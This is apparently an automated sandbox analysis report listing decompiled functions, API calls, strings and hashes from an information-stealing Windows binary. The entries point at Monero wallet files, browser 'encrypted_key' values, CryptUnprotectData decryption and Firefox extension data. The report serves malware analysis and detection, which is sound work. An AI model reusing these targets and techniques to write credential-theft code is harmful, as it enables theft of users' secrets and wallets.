                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesswsprintf
                                      • String ID: %hs
                                      • API String ID: 769748085-2783943728
                                      • Opcode ID: 0794fd87307f069d48dc47d6d9aa51759e8100f330a21068af530f777e50771b
                                      • Instruction ID: eaf1747e42fd32274b29497b165a9563552afd576b6bba876f07990be81e6a78
                                      • Opcode Fuzzy Hash: 0794fd87307f069d48dc47d6d9aa51759e8100f330a21068af530f777e50771b
                                      • Instruction Fuzzy Hash: E4E0EC75A68309BBDB10DB94DD0AE6D77B8EB05701F000196FD09D7340DA719E109BA5
                                      Function 00ACA990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00AD8CF0: GetSystemTime.KERNEL32(00AE0E1B,0154E890,00AE05B6,?,?,00AC13F9,?,0000001A,00AE0E1B,00000000,?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00AD8D16
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ACAA11
                                      • lstrlen.KERNEL32(00000000,00000000), ref: 00ACAB2F
                                      • lstrlen.KERNEL32(00000000), ref: 00ACADEC
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                      • DeleteFileA.KERNEL32(00000000), ref: 00ACAE73
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 48e65a25a42b2f1cec7538249d7e61ffb0038944c3eb03e24200ee31a7420b89
                                      • Instruction ID: 29acdae58e35457f16f44eb684deb48204086ff889dcd10f91a3d55c63b8e929
                                      • Opcode Fuzzy Hash: 48e65a25a42b2f1cec7538249d7e61ffb0038944c3eb03e24200ee31a7420b89
                                      • Instruction Fuzzy Hash: F4E1BF729101189BCB05EBA4DEA6EEE7339AF24300F50855BF15776291EF306E49CB72
                                      Function 00ACD500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00AD8CF0: GetSystemTime.KERNEL32(00AE0E1B,0154E890,00AE05B6,?,?,00AC13F9,?,0000001A,00AE0E1B,00000000,?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00AD8D16
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ACD581
                                      • lstrlen.KERNEL32(00000000), ref: 00ACD798
                                      • lstrlen.KERNEL32(00000000), ref: 00ACD7AC
                                      • DeleteFileA.KERNEL32(00000000), ref: 00ACD82B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 4ababfe1186ced65b2f4fb83b0366b5c6ff0d186a8bb0c455d6f5c2eb10d4d3c
                                      • Instruction ID: 05a3b4d01fa7e68e47d2e8c354eb5a6e1c0984ef152e0f47f6feb6950e7061c1
                                      • Opcode Fuzzy Hash: 4ababfe1186ced65b2f4fb83b0366b5c6ff0d186a8bb0c455d6f5c2eb10d4d3c
                                      • Instruction Fuzzy Hash: 0291D1729101189BCB04FBA4DEA6EEE7339AF64300F50456BF15776291EF306A49CB72
                                      Function 00ACD880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00AD8CF0: GetSystemTime.KERNEL32(00AE0E1B,0154E890,00AE05B6,?,?,00AC13F9,?,0000001A,00AE0E1B,00000000,?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00AD8D16
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ACD901
                                      • lstrlen.KERNEL32(00000000), ref: 00ACDA9F
                                      • lstrlen.KERNEL32(00000000), ref: 00ACDAB3
                                      • DeleteFileA.KERNEL32(00000000), ref: 00ACDB32
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 04bd931753a4f1893858dc334313bdf2bdfe4cb09f083e827d7af8a7fd90e867
                                      • Instruction ID: e48107711794e5e832b3adf3009f7d4daa690e44f6900ca4d3d989401071e534
                                      • Opcode Fuzzy Hash: 04bd931753a4f1893858dc334313bdf2bdfe4cb09f083e827d7af8a7fd90e867
                                      • Instruction Fuzzy Hash: C181E5729201189BCB04FBA4DE66EEE7339AF64300F40455BF557A6291EF346E09CB72
                                      Function 00B3FED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AdjustPointer
                                      • String ID:
                                      • API String ID: 1740715915-0
                                      • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction ID: a1abc80e112b4299c6e7b0632f6960cf4d6f81b640220ae91083c9fc751b4040
                                      • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction Fuzzy Hash: 0C51B07290120AAFEB299F54D891BBA77E4FF01310F3485B9ED0586691E731EE40EB90
                                      Function 00ACA560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00ACA664
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocLocallstrcpy
                                      • String ID: @$v10$v20
                                      • API String ID: 2746078483-278772428
                                      • Opcode ID: 43dc7d3679da52fbe1942c644c5d9b51cc137ce6634d8c227a5fc30394ca8393
                                      • Instruction ID: db9f732007a7b652416dbeea162912ebb172943c276ac2f79bf949276134777c
                                      • Opcode Fuzzy Hash: 43dc7d3679da52fbe1942c644c5d9b51cc137ce6634d8c227a5fc30394ca8393
                                      • Instruction Fuzzy Hash: 65515A71A1020CEFDB14EFA4CE96FED7775BF60344F008119E90AAB291DB70AA45CB52
                                      Function 00ACF5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00ACA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00ACA13C
                                        • Part of subcall function 00ACA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00ACA161
                                        • Part of subcall function 00ACA110: LocalAlloc.KERNEL32(00000040,?), ref: 00ACA181
                                        • Part of subcall function 00ACA110: ReadFile.KERNEL32(000000FF,?,00000000,00AC148F,00000000), ref: 00ACA1AA
                                        • Part of subcall function 00ACA110: LocalFree.KERNEL32(00AC148F), ref: 00ACA1E0
                                        • Part of subcall function 00ACA110: CloseHandle.KERNEL32(000000FF), ref: 00ACA1EA
                                        • Part of subcall function 00AD8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AD8FE2
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00AE1678,00AE0D93), ref: 00ACF64C
                                      • lstrlen.KERNEL32(00000000), ref: 00ACF66B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                      • API String ID: 998311485-3310892237
                                      • Opcode ID: b9f67a59c40cf22a622a527261f68ab5efce5f70f7a67710702c607bc8c88800
                                      • Instruction ID: 5128f9beedea144bbc464dfe6117b401460dbec73c72ff6ed889f37d42e78238
                                      • Opcode Fuzzy Hash: b9f67a59c40cf22a622a527261f68ab5efce5f70f7a67710702c607bc8c88800
                                      • Instruction Fuzzy Hash: 4C51FF76D10108ABCB04FBF4DEA6DED7379AF64300F40856AF45767291EE346A09CB62
                                      Function 00AD37B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen
                                      • String ID:
                                      • API String ID: 367037083-0
                                      • Opcode ID: 9a96eb3009ce8bb29963e32b8ea7f24f39978487c611eab81151c89b19471e37
                                      • Instruction ID: b8258dc7425c69ca34e5162217d0e333458999ae6b02636eece088ee02dba84d
                                      • Opcode Fuzzy Hash: 9a96eb3009ce8bb29963e32b8ea7f24f39978487c611eab81151c89b19471e37
                                      • Instruction Fuzzy Hash: B5411D72D10209ABCF04EFA5D955EEEB779AF54304F00841AF51776390EB709A45CFA2
                                      Function 00ACA430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ACA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00ACA13C
                                        • Part of subcall function 00ACA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00ACA161
                                        • Part of subcall function 00ACA110: LocalAlloc.KERNEL32(00000040,?), ref: 00ACA181
                                        • Part of subcall function 00ACA110: ReadFile.KERNEL32(000000FF,?,00000000,00AC148F,00000000), ref: 00ACA1AA
                                        • Part of subcall function 00ACA110: LocalFree.KERNEL32(00AC148F), ref: 00ACA1E0
                                        • Part of subcall function 00ACA110: CloseHandle.KERNEL32(000000FF), ref: 00ACA1EA
                                        • Part of subcall function 00AD8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AD8FE2
                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00ACA489
                                        • Part of subcall function 00ACA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AC4F3E,00000000,00000000), ref: 00ACA23F
                                        • Part of subcall function 00ACA210: LocalAlloc.KERNEL32(00000040,?,?,?,00AC4F3E,00000000,?), ref: 00ACA251
                                        • Part of subcall function 00ACA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AC4F3E,00000000,00000000), ref: 00ACA27A
                                        • Part of subcall function 00ACA210: LocalFree.KERNEL32(?,?,?,?,00AC4F3E,00000000,?), ref: 00ACA28F
                                        • Part of subcall function 00ACA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00ACA2D4
                                        • Part of subcall function 00ACA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00ACA2F3
                                        • Part of subcall function 00ACA2B0: LocalFree.KERNEL32(?), ref: 00ACA323
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
